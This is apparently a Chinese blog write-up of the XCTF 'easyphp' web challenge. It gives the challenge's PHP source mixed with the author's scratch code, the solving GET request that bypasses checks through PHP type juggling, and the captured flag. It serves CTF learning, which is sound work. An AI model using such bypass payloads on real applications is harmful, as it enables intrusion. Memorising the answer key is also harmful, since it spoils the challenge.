攻防世界-web- easyphp

#攻防世界-web- easyphp

依次构造a、b、c的值！

//highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
echo $key1;
echo intval('1e7');
// $a = $_GET['a'];
// $b = $_GET['b'];
$a='1e7';
$b=3;
echo intval($a);
echo substr(md5($b),-6,6);

$i=1;
while($i<=100000)
{
    if( '8b184b' === substr(md5($i),-6,6)){
    echo "The number is " . $i . "
";
    break;    
}

    $i++;
}
//$c=array("m",2022,array("n","DGGJ","DGGJ"));
//echo json_encode($c);
//$c=json_encode($c);

//shi c={"m":"12345a","n":[[0,1,2],0]}
$c=array("m",2022,array("n","DGGJ","DGGJ"));

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
        $key1 = 1;
        }else{
            die("Emmm...再想想");
        }
    }else{
    die("Emmm...");
}

$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
        $d = array_search("DGGJ", $c["n"]);
        $d === false?die("no..."):NULL;
        foreach($c["n"] as $key=>$val){
            $val==="DGGJ"?die("no......"):NULL;
        }
        $key2 = 1;
    }else{
        die("no hack");
    }
}else{
    die("no");
}

if($key1 && $key2){
    include "Hgfks.php";
    echo "You're right"."\n";
    echo $flag;
}

// echo str(intval('1e7'));
// echo "You're right"."\n";
//echo "haha";

$test="haha";
echo $test;

?> Emmm...

用GET方法提交！

http://61.147.171.105:63643/?a=1e9&b=53724&c={“m”:“12345a”,“n”:[[0,1,2],0]}

cyberpeace{8e408aaf6079e7d495fde46e8ec9fbaa}

参考地址：

攻防世界web新手区easyphp题解writeup

weixin_46906325

于 2022-10-03 19:30:27 发布

734
收藏 2
文章标签： 安全 php
版权
写在前面
最近在学习CTF web相关知识，顺带学习php，在攻防世界平台上做做题。遇到了一道名为easyphp的题目，对我这个新手一点也不easy，于是决定把过程记录下来。
————————————————
版权声明：本文为CSDN博主「weixin_46906325」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/weixin_46906325/article/details/127154789